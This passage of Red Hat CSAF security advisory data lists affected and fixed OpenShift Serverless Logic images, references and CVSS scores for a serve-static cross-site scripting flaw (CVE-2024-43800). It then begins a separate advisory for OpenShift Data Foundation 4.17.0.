"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, ], }
RHSA-2024:8676
Vulnerability from csaf_redhat
Published
2024-10-30 14:25
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update
Notes
Topic
Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.
These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:
https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index
All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.\n\nThese updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index\n\nAll Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8676", url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2059669", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2059669", }, { category: "external", summary: "2190161", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2190161", }, { category: "external", summary: "2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "2241329", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2241329", }, { category: "external", summary: "2245068", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2245068", }, { category: "external", summary: "2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "2253013", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2253013", }, { category: "external", summary: "2257271", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2257271", }, { category: "external", summary: "2259668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259668", }, { category: "external", summary: "2262777", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2262777", }, { category: "external", summary: "2268046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", }, { category: "external", summary: "2268820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268820", }, { category: "external", summary: "2271773", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2271773", }, { category: "external", summary: "2272597", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272597", }, { category: "external", summary: "2275225", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2275225", }, { category: "external", summary: "2275965", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2275965", }, { category: "external", summary: "2276393", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276393", }, { category: "external", summary: "2276672", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276672", }, { category: "external", summary: "2279751", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2279751", }, { category: "external", summary: "2279876", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2279876", }, { category: "external", summary: "2280308", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280308", }, { category: "external", summary: "2280608", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280608", }, { category: "external", summary: "2280637", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280637", }, { category: "external", summary: "2283994", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283994", }, { category: "external", summary: "2292435", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292435", }, { category: "external", summary: "2292668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292668", }, { category: "external", summary: "2294234", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2294234", }, { category: "external", summary: "2294723", url: 